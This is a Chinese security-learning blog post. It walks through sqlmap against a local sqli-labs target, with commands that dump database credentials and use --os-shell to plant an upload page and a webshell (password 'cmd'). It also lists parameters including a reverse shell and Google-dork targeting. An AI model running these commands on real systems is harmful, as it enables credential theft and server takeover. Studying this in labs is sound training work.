SQL注入(3)——SQLMAP

最新推荐文章于 2024-05-15 22:19:08 发布
最新推荐文章于 2024-05-15 22:19:08 发布
阅读量796 收藏 3
点赞数 4
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realmels/article/details/116138250
版权

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入

之前介绍了各种SQL注入的方法,今天介绍SQLMAP工具的使用及如何通过SQL注入拿到Webshell

介绍

SQLMap是一个用Python写的SQL注入工具,可以轻松地对目标进行SQL注入攻击

安装

由于我已经安装了Python环境,所以我这里是直接用pip安装

打开DOS,输入:

pip install sqlmap -i https://mirrors.aliyun.com/pypi/simple/

在这里插入图片描述
这样就是安装成功了

然后在dos中输入sqlmap,如果出现像下图的,则为安装成功
在这里插入图片描述

使用

我们通过一个实例来讲解SQLMAP的使用

测试地址:http://192.168.1.9/sql1/Less-1/?id=1
注入检测
简单查看页面,怀疑存在SQL注入漏洞
在这里插入图片描述
直接放进sqlmap扫描。指令:

 sqlmap -u http://192.168.1.9/sql1/Less-1/?id=1

在这里插入图片描述
如图,返回了数据库的版本和信息,说明存在注入

返回结果介绍:
在这里插入图片描述
这一堆东西说明了存在注入的参数和注入方法,以及各种注入的Payload

在这里插入图片描述
这里说了数据库的类型版本,如果在测试中出现此内容,说明存在注入漏洞。

信息获取
获取当前用户sqlmap -u http://192.168.1.9/sql1/Less-1/?id=1 --current-user
在这里插入图片描述

获取当前数据库:sqlmap -u http://192.168.1.9/sql1/Less-1/?id=1 --current-db
在这里插入图片描述

获取所有数据库:sqlmap -u http://192.168.1.9/sql1/Less-1/?id=1 --dbs
在这里插入图片描述

获取security数据库的所有表:sqlmap -u http://192.168.1.9/sql1/Less-1/?id=1 -D security -tables
在这里插入图片描述

获取users表中所有字段:sqlmap -u http://192.168.1.9/sql1/Less-1/?id=1 -D security -T users -columns
在这里插入图片描述

获取username,password的内容:sqlmap -u http://192.168.1.9/sql1/Less-1/?id=1 -D security -T users -C username,password -dump
在这里插入图片描述
-dump可以导出数据,数据导出位置在
在这里插入图片描述
在这里插入图片描述
GetShell
通过SQLMAP获取shell
判断是否为dba:sqlmap -u http://192.168.1.9/sql1/Less-1/?id=1 --is-dba
在这里插入图片描述
如果这里权限是dba的话,可以尝试直接写shell
使用os-shell可以执行系统指令,同时向服务器上传一个文件用于文件上传
前提是需要知道网站的绝对路径并且有文件权限。

sqlmap -u http://192.168.1.9/sql1/Less-1/?id=1 --os-shell

在这里插入图片描述
这里会要你选择网站的语言。选择4,PHP
在这里插入图片描述在这里要猜解网站的绝对路径,可以使用SQLMAP的字典,也可以自己导入字典。我这里直接1,使用SQLMAP的字典。
在这里插入图片描述
假如猜解成功,就会返回一个shell。

注意,在这里有两个地址
在这里插入图片描述
告诉我们上传了一个上传文件的位置和一个后门到服务器。
我们分别访问看一下
http://192.168.1.9:80/tmpupupp.php
在这里插入图片描述
在这里是一个文件上传点,可以上传自己的大马,小马,一句话。

http://192.168.1.9/tmpbbeih.php
这里直接上传了一个Webshell,可以直接菜刀连接,密码是cmd
在这里插入图片描述
不过这个马并不是免杀的,你可以上传自己的免杀马。

同时,在这里也可以执行自己想执行的指令,例如获取自身权限
在这里插入图片描述

常用参数

SQLMAP常用参数
参数说明
-b获取 banner
-p指定测试参数
-g从Google中获取URL,-g "inurl:aspx?id="
--gpage指定Google页码
--union-check是否支持 union 注入
--union-use使用union注入
--proxy代理注入
--threads采用多线程
--referer=REFERERHTTP referer头
--keep-alive使用持久 HTTP(S)连接
--hostname主机名
--is-dba是否管理员权限
--users枚举所有用户
--passwords枚举所有用户密码
--roles针枚举所有用户角色
--dump转存DBMS数据库表项目,需要指定字段名称
--sql-query执行SQL语句
--file-read读取文件(需要File权限和绝对路径)
--file-write写入操作(需要File权限和绝对路径)
--file-desk绝对路径写入
--os-pwn反弹shell
--cookie=COOKIE指定Cookie
--random-agent使用随机 User-Agent 头
--level测试等级(1~5),默认为1
这里Level可以设置测试等级,当等级达到3时将尝试cookie注入,同时需要的时间更长。

Threads可以设置线程数,在时间盲注时可加快效率。

-p可以指定测试参数,例如 -p id 意为测试参数id。

漫路在线
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
SQL注入工具之SQLmap入门操作
caixiangting的博客
02-19 1201
level=LEVEL //水平1-5,也不是数字越高越精准,但也不是越高越好。越高数据包发送量就越大,被发现的可能也就越大。如果怕把甲方业务搞挂了,也不要开的太大。--risk=RISK //风险1-3,也不是数字越高越精准,但也不是越高越好。越高数据包发送量就越大,被发现的可能也就越大。虽然没有官方的图形化界面,但是市面上有很多个人做的图形化插件,如果实在不熟悉命令行可以考虑换成图形化插件进行使用。:可以从官方网站(https://sqlmap.org/)下载最新版本的SQLmap
SQL注入——SQLmap使用
cldimd的博客
03-19 482
什么是sqlmap SQLmap SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取完全操作权限时实行任意命令 SQLmap-工作原理 当给sqlmap这么一个url的时候,它会: 检测网站是否能够访问。 检测是否有waf。...
sqlmap获取管理密码和用户名
weixin_51558394的博客
03-11 7140
sqlmap获取用户名
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4014
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
SQL注入sqlmap使用教程(超详细)
最新发布
MateSnake的博客
05-15 657
SQL注入sqlmap使用教程(超详细)
Web安全工具—Sqlmap常用命令和参数(持续更新)
weixin_44431280的博客
04-07 1万+
Web安全工具—SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习。 一:SQLMAP介绍: 简介:sqlmap是一个由python语言编写的开源自动化渗透测试工具,主要被用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。 支持检测的数据库:access,mysql,oracle,postgresql,sqlserver(mssql),db2等 支持的注入类型:布尔盲注,时间盲注,显错注入,堆叠注入,联合查询注入等,
SQLmap参数详解
Williamanddog的博客
01-19 5438
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
SQL注入——SQL注入方法
cldimd的博客
03-19 342
1、手工注入 1、常用函数 user() 返回当前使用数据库的用户 version() 返回当前数据库的版本 database() 返回当前使用的数据库 concat() 用于将多个字符串连接成一个字符串,SELECT CONCAT('My...
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全SQL注入工具的使用指南, 该工具在windows平台与linux平台下均可以使用。数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞。
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL...
sqlmap中文手册.pdf
08-13
技术——sqlmap 支持的 SQL 注入技术 特性——支持的特性列表 下载更新——更新你的 sqlmap 副本 相关依赖——关于第三方库和工具的信息 历史——从 2006 到 2017 用法——所有选项和开关的详尽解释,包含相应实例。...
sqlmap一键安装,解压即用!绿色无忧!
10-14
在这里,我将向你介绍一个无与伦比的工具——SQLMap。你可能已经听说过它,但我要告诉你的是,它比你想象的要强大得多。 SQLMap,就像它的名字所暗示的,是一个为你提供方便的“SQL注入攻击”的工具。对于那些不...
sqlmap 渗透测试工具
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库...
SQLMap 使用参数详解
热门推荐
qq_37019068的博客
10-09 1万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
SQL注入SQLMap
qq_53218512的博客
07-24 965
Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。
sqlmap检测网址sql注入
weixin_44384073的博客
03-01 1053
下载sql git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-dev 用python运行sqlmap python sqlmap.py -u "检测xxx网址" --cooki
sql注入在线检測(sqlmapapi)
weixin_33851177的博客
04-08 216
    之前一搞渗透的同事问我。sqlmapapi.py是干啥的,我猜非常多人都玩过sqlmap,但玩过sqlmapapi的应该比較少,今天就和大家一起看看怎样使用以及一些美的地方。说白了。sqlmapapi.py就是提供了一个检查sql注入的接口。我们能够直接通过发送http请求扫描sql注入获取扫描结果等一系列操作。    以下通过实例演示怎样使用:一.启动server端server后端...
利用SQLmap实现 SQL 注入
m0_71805735的博客
06-21 2286
利用SQLmap实现 SQL 注入
sql注入知识----sqlmap常用参数
尘玥的故事
01-23 886
在知道注入点在哪里时通过' * '进行测试 工具会识别' * '并在这里测试数据库常用 urrent-db //查看当前的数据库passwords //查看所有密码batch 按照软件默认设置,自动回答start x1 --stop x2 输出从x1到x2的啥啥啥参数:–answers参数:--threads-dbs 列出所有数据库current-db 获取当前数据库名称tables -D “ ” 获取指定数据库中的表 columns -T “4” -D “3”获取数据库3中的4表的所有字段(列名
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全漏洞,攻击者通过在输入数据中插入恶意的SQL代码,使应用程序接受并执行其代码,从而获得不应该被揭示的敏感信息。SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值